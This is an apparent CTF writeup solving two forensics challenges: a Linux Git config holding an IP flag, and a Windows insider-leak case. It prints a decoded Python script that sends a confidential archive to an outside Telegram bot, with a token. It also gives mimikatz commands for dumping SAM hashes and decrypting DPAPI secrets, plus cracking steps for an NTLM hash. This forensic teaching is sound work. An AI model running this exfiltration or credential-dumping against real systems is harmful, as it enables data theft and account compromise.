IEEE Victoris 4.0 — CTF 2025 — Quals DFIR Challenges
2026-6-12 07:12:45 Author: infosecwriteups.com

Loay Salah

Hi, I’m glad to share with you my writeup for getting first blood in 2/2 DFIR challenges.


First Challenge: “the Frontdoor” FIRST BLOOD🩸

In this challenge, we have a Linux disk image that we need to investigate to get the correct answer. Reading the bash history or “.zsh_history”, we can see a lot of file-navigation commands and Git activity in “MyProject”, which is located in /home/Documents.

Also, while I was digging around all the Linux files, I found an XML file “recently-used.xml” located at “/home/kali/.local/share/recently-used.xml”. This XML tracks that he opened the /home/kali/Documents/MyProject/.git/config file using Mousepad and Thunar (the Kali Linux GUI).


So, the config file will be the first file to check in the MyProject directory.


We can see there's a beautiful base64-encoded string that contains our flag:


IEEE{192.168.213.68:3421}

Second Challenge: “Lay-off” FIRST BLOOD🩸

This one was so challenging; we got 14 questions that need to be answered correctly to get our very precious flag.


=== Question Menu ===
Unanswered:
1) What is the full name of the employee who sent the email?
2) When was QR Tag company founded? (format: year)
3) What website did the developer log into at 2025-09-18 17:56:51?
4) what was the first thing the developer looked for after receiving the email?
5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?
6) Can you determine the number of files have been leaked?
7) When did this archive get deleted?
8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?
9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)
10) Which telegram API did the developer use to send the archive to the bot?
11) What is the username and password of the database used in QR Tag website? (format: username:password)
12) What version of express did the developer use?
13) What service will the QR Tag partnership provide?
14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?

We have a Windows disk image and an email:

1) What is the full name of the employee who sent the email?

Open the email with Thunderbird and you'll find the correct answer easily:


1) What is the full name of the employee who sent the email? --> Huda Ahmed
2) When was QR Tag company founded? (format: year)

With some online research on LinkedIn, we'll find a page with the same name located in Ismailia, Egypt.


The challenge author follows this page.
2) When was QR Tag company founded? (format: year) --> 2024
3) What website did the developer log into at 2025-09-18 17:56:51?

The key is “log into”: check the Microsoft Edge History database, which is located at: C:\Users\<username>\AppData\Local\Microsoft\Edge\User Data\<Profile>\History

In the urls table, sort by time and use the following website to decode the timestamp:


The time matches perfectly.
3) What website did the developer log into at 2025-09-18 17:56:51?
Answer: www.qrtagapp.com
4) what was the first thing the developer looked for after receiving the email?

Using Thunderbird, open the email with “message source”, or open the email with any text editor:

So, the correct time must be “2025-09-19 00:08:59” in GMT+3.

Now let's look for anything interesting in the Firefox history database, located at: C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<profile folder>\places.sqlite

You'll find that the most recent searches after the email was sent were all these searches in the “moz_places” table:
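Both browser databases store visit times as raw integers in different epochs, which is why a decoder was needed for question 3 and the Firefox timeline above. The Python below is an added example, not part of the original writeup: it decodes Edge (microseconds since 1601) and Firefox (microseconds since 1970) timestamps exactly, sorts a constructed stand-in for the Edge urls table by time, and renders the GMT+3 local time used for the answers. The table rows and URLs are constructed, not taken from the challenge image.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)   # Chromium/Edge epoch
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)     # Firefox epoch
EGYPT = timezone(timedelta(hours=3))                       # GMT+3, used for the answers


def webkit_to_utc(value: int) -> datetime:
    """Edge/Chromium last_visit_time (microseconds since 1601) -> aware UTC datetime."""
    return WEBKIT_EPOCH + timedelta(microseconds=value)


def firefox_to_utc(value: int) -> datetime:
    """Firefox moz_places.last_visit_date (microseconds since 1970) -> aware UTC datetime."""
    return UNIX_EPOCH + timedelta(microseconds=value)


def to_local(ts: datetime) -> str:
    """Render in the challenge's answer format, shifted to GMT+3."""
    return ts.astimezone(EGYPT).strftime("%Y-%m-%d %H:%M:%S")


def edge_urls_by_time(db: sqlite3.Connection) -> list:
    """Rows of the Edge 'urls' table, newest first, with decoded UTC timestamps."""
    rows = db.execute(
        "SELECT url, last_visit_time FROM urls ORDER BY last_visit_time DESC")
    return [(url, webkit_to_utc(raw)) for url, raw in rows]


def build_sample_history() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the Edge History DB (schema subset only)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE urls (id INTEGER PRIMARY KEY, url TEXT, title TEXT, "
               "last_visit_time INTEGER)")
    db.executemany(
        "INSERT INTO urls (url, title, last_visit_time) VALUES (?, ?, ?)",
        [("https://example.invalid/login", "Login", 13402691811000000),  # 2025-09-18 17:56:51 UTC
         ("https://example.invalid/", "Home", 13402691700000000)])
    return db
```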


4) what was the first thing the developer looked for after receiving the email?

Answer: telegram leaks channels

5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?

This was a little dizzying, but what I did was parse the prefetch files with PECmd (link here) and look for any zip, rar, 7z, gz and so on.

And yes, I found the prefetch data for 7z.exe:


Now let's check all the files referenced; we can see a 7z file located on MHANY's desktop:


5) The developer created a compressed archive to leak confidential information about QR Tag company. What was it's name?
CONFIDENTIAL.7Z
6) Can you determine the number of files have been leaked?

That's simple: in the prefetch we parsed, we can view all the files that were compressed and have been leaked:


Just count all the files below the CONFIDENTIAL.7Z entry:

6) Can you determine the number of files have been leaked? --> 11
7) When did this archive get deleted?

Parse the $J file with MFTECmd (link here), located at C:\$Extend\$J, to see all file creation, deletion and renaming timestamps.


We got the deletion timestamp: 9/19/2025 8:05:17 AM GMT 0.


Convert it to the format the flag answer expects, add 3 hours to get GMT+3 (local Egyptian time), then subtract 1 second.

7) When did this archive get deleted?
Answer: 2025-09-19 11:05:16
8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?

This question needs deep investigation, and good eyesight to catch malicious scripts. I found a Python file in Temp called botscript.py (full path: C:\Users\mhany\AppData\Local\temp\botscript.py) that contains a very long base64-encoded string:


It's not just encoded, it's reversed, because of this:

b64decode(__[::-1]);

So let's reverse it first, then decode the base64 here:

import requests

I1lI11llIIl1 = "8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw"   # Telegram bot token
lIll1IIl11 = "5321402519"                                          # chat id (name fixed: the decoded name began with a digit, which is not valid Python)
l1II1ll1II = r'C:\Users\mhany\Desktop\Confidential.7z'             # the archive to send
url = f"https://api.telegram.org/bot{I1lI11llIIl1}/sendDocument"

with open(l1II1ll1II, "rb") as f:
    response = requests.post(url, data={"chat_id": lIll1IIl11}, files={"document": f})

if response.status_code == 200:
    print("File sent successfully")
else:
    print("Error:", response.text)

So, he sent the data over a Telegram bot using a Python script.

8) The developer contacted some buyers on telegram dark markets to sell some of QR Tag's confidential information. What utility did he use to send the data?
Answer: python
9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)
10) Which telegram API did the developer use to send the archive to the bot?

From the decoded script above, we can answer these two questions easily.


A simple Python script. Read, understand, answer.

9) What is the bot token and chat id used in the script? (format: bot_token:chat_id)
Answer: 8225327010:AAErxtchORepKDCJepnwWkbKPbRf_FBketw:5321402519

10) Which telegram API did the developer use to send the archive to the bot?
Answer: /sendDocument
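Here is an added example (not the challenge's botscript.py and not code from the writeup) showing how to triage such a loader statically for questions 8 to 10: undo the `[::-1]` reversal, base64-decode, and pull out the bot token, chat id and API method without executing the script. The embedded script and its token are constructed placeholders.

```python
import base64
import re

# Shape of a Telegram bot token, a Bot API URL built from a variable, and a
# plain "name = 'value'" assignment used to resolve that variable.
TOKEN_RE = re.compile(r'"(\d{8,10}:[A-Za-z0-9_-]{35})"')
METHOD_RE = re.compile(r'api\.telegram\.org/bot\{[^}]*\}/(\w+)')
ASSIGN_TMPL = r'^\s*{name}\s*=\s*["\']([^"\']+)["\']'

# Constructed stand-in for the decoded script; the token is a placeholder.
FAKE_TOKEN = "1234567890:" + "B" * 35
INNER_SCRIPT = (
    "import requests\n"
    f'tok = "{FAKE_TOKEN}"\n'
    'cid = "987654321"\n'
    'path = r"C:\\Users\\someone\\Desktop\\archive.7z"\n'
    'url = f"https://api.telegram.org/bot{tok}/sendDocument"\n'
    'with open(path, "rb") as f:\n'
    '    r = requests.post(url, data={"chat_id": cid}, files={"document": f})\n'
)
# What the loader actually carries: base64 of the script, then reversed.
LOADER_BLOB = base64.b64encode(INNER_SCRIPT.encode()).decode()[::-1]


def unwrap_reversed_b64(blob: str) -> str:
    """Undo payload = base64(script)[::-1] and return the plaintext script."""
    return base64.b64decode(blob[::-1]).decode()


def resolve(name: str, script: str):
    """Return the string literal assigned to `name` in the script, or None."""
    m = re.search(ASSIGN_TMPL.format(name=re.escape(name)), script, re.M)
    return m.group(1) if m else None


def triage(script: str) -> dict:
    """Extract token, chat id and API method without executing anything."""
    token = TOKEN_RE.search(script)
    method = METHOD_RE.search(script)
    chat_var = re.search(r'"chat_id"\s*:\s*(\w+)', script)
    return {
        "token": token.group(1) if token else None,
        "chat_id": resolve(chat_var.group(1), script) if chat_var else None,
        "method": "/" + method.group(1) if method else None,
    }
```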

11) What is the username and password of the database used in QR Tag website? (format: username:password)

Since the question asks for the username and password for the QR Tag website, we can see there's a QRTag Portal directory on mhany's desktop that contains two subdirectories (Backend & Frontend). Checking the Backend directory, we find a .env file with the absolute path: C:\Users\mhany\Desktop\Work\QR Tag\QRTag Portal\Backend\.env

11) What is the username and password of the database used in QR Tag website? (format: username:password)
Answer: H4ny:P@ssw0rd!
12) What version of express did the developer use?

In the same Backend directory, C:\Users\mhany\Desktop\Work\QR Tag\QRTag Portal\Backend, we'll find a package.json file that holds the correct answer:


12) What version of express did the developer use?
Answer: 4.19.2
13) What service will the QR Tag partnership provide?

Checking the Docs directory located at C:\Users\mhany\Desktop\Work\QR Tag\Docs\, we can see there's a PDF file called partnership_agreement.pdf:

13) What service will the QR Tag partnership provide?
Answer: identity verification and fraud prevention
14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?

Now, for the last juicy part.

In question 13, we answered with the PDF file located in the C:\Users\mhany\Desktop\Work\QR Tag\Docs\ directory.

So, while I was checking all the other document files, I found a file called finance.xlsx with very strange magic bytes:

finance.xlsx

Of course, these are not the usual hex values for an Excel file. To make it clearer, there's another Excel file called user_accounts.xlsx:

user_accounts.xlsx

See the difference!!!! finance.xlsx is definitely not an Excel sheet file.

So, the question now is: what is it actually?

And the question says “The developer used a security feature to securely encrypt a secret file”.

So this file is encrypted with a Windows security feature, I guess!!

If we do a quick Google search for the magic bytes 01 00 00 00 D0 8C, we can definitely get to the point:

DPAPI

I also did a very weird bit of research: I uploaded the Excel file to VirusTotal (link) (I was the first one to upload this file), and by reading the Details section we can confirm that this file contains DPAPI-encrypted data (100%):


1. We need to recover the DPAPI masterkey to decrypt the file data.

2. To recover the DPAPI masterkey, we need to decrypt the masterkey file, located at: C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>

3. To decrypt the masterkey file, we need to recover the logon password for the user “mhany”.

4. To recover the logon password for this user, we need to decrypt the SAM registry hive, which contains the local account password hashes.

5. To decrypt the SAM registry hive, we will also need the SYSTEM hive. Both are located in the C:\Windows\System32\config\ directory.
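As an added example (not part of the writeup and no decryption involved), the Python below does the identification work that precedes this chain in code: it tells a genuine .xlsx (a ZIP container, magic `PK\x03\x04`) apart from a DPAPI blob by the version field and provider GUID that produce the `01 00 00 00 D0 8C` bytes, and reads the blob header far enough to learn which masterkey GUID file under Protect\<SID>\ step 2 needs. The sample blob is constructed and header-only; the field layout follows the documented DPAPI blob header.

```python
import struct
import uuid

# Provider GUID every DPAPI blob carries right after the 4-byte version field;
# its little-endian encoding starts with d0 8c, hence "01 00 00 00 D0 8C".
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
ZIP_MAGIC = b"PK\x03\x04"   # a genuine .xlsx is an OOXML ZIP container


def classify(data: bytes) -> str:
    """Cheap magic-byte check: 'ooxml/zip', 'dpapi-blob' or 'unknown'."""
    if data.startswith(ZIP_MAGIC):
        return "ooxml/zip"
    if (len(data) >= 20 and struct.unpack_from("<I", data)[0] == 1
            and uuid.UUID(bytes_le=data[4:20]) == DPAPI_PROVIDER):
        return "dpapi-blob"
    return "unknown"


def dpapi_header(data: bytes) -> dict:
    """Parse the DPAPI blob header up to the description string."""
    if classify(data) != "dpapi-blob":
        raise ValueError("not a DPAPI blob")
    mk_version, = struct.unpack_from("<I", data, 20)
    mk_guid = uuid.UUID(bytes_le=data[24:40])        # names the masterkey file needed
    flags, desc_len = struct.unpack_from("<II", data, 40)
    desc = data[48:48 + desc_len].decode("utf-16-le").rstrip("\x00")
    return {"masterkey_version": mk_version, "masterkey_guid": str(mk_guid),
            "flags": flags, "description": desc}


def build_sample_blob(mk_guid: str, description: str = "finance") -> bytes:
    """Constructed header-only blob for demonstration; a real blob continues
    with salt, cipher and HMAC fields followed by the ciphertext."""
    desc = (description + "\x00").encode("utf-16-le")
    return (struct.pack("<I", 1) + DPAPI_PROVIDER.bytes_le
            + struct.pack("<I", 1) + uuid.UUID(mk_guid).bytes_le
            + struct.pack("<II", 0, len(desc)) + desc)
```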

Now we know what to do, let's dig in using mimikatz “link”. Run mimikatz.exe from an administrative PowerShell, then use these commands:

privilege::debug   # enables mimikatz to read protected data

lsadump::sam /system:<SYSTEM hive path> /sam:<SAM hive path>

Reading the output, remember we are looking for the NTLM hash of the mhany user only.

Using a rainbow-table attack with CrackStation, we can get the actual password for this hash:


credentials

Now that we have the logon password, let's recover the master key by decrypting the masterkey file. With mimikatz again, we can use these commands:

sekurlsa::logonpasswords   # because we already have the logon password

dpapi::masterkey /in:"path to: C:\Users\mhany\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>" /password:"credentials"

Now we get the decrypted master key in hex.


The final step is to decrypt the encrypted finance.xlsx file with the key:

dpapi::blob /in:"path to C:\Users\mhany\Desktop\Work\QR Tag\Docs\finance.xlsx" /masterkey:"d96486156b7651c31945791790941b62f180d198c06966e7e9568d594375c760cf528e6bf55a3bd6dc1bec079b38cbb569a222444ffce861b71a61330ddd1"


FINALLY

Let's decode this base64-encoded data with CyberChef “link”:


OMG!
14) The developer used a security feature to securely encrypt a secret file. Can you determine what he was trying to hide?
Answer: us1ng_m4st3r_k3y_t0_d3crypt_DPAPI_encrypt3d_s3cr3ts

Now we can submit all the answers and get the flag:


IEEE{Ins1d3r_Thr34t_0r_Just_A_Mad_Dev3l0per}

Thanks For Reading, Hope you enjoyed❤️

Keep in touch with me via:

LinkedIn

Discord: prankster99


Source: https://infosecwriteups.com/ieee-mansb-ctf-2025-dfir-writeup-3b49a1afe7f6?source=rss----7b722bfd1b8d---4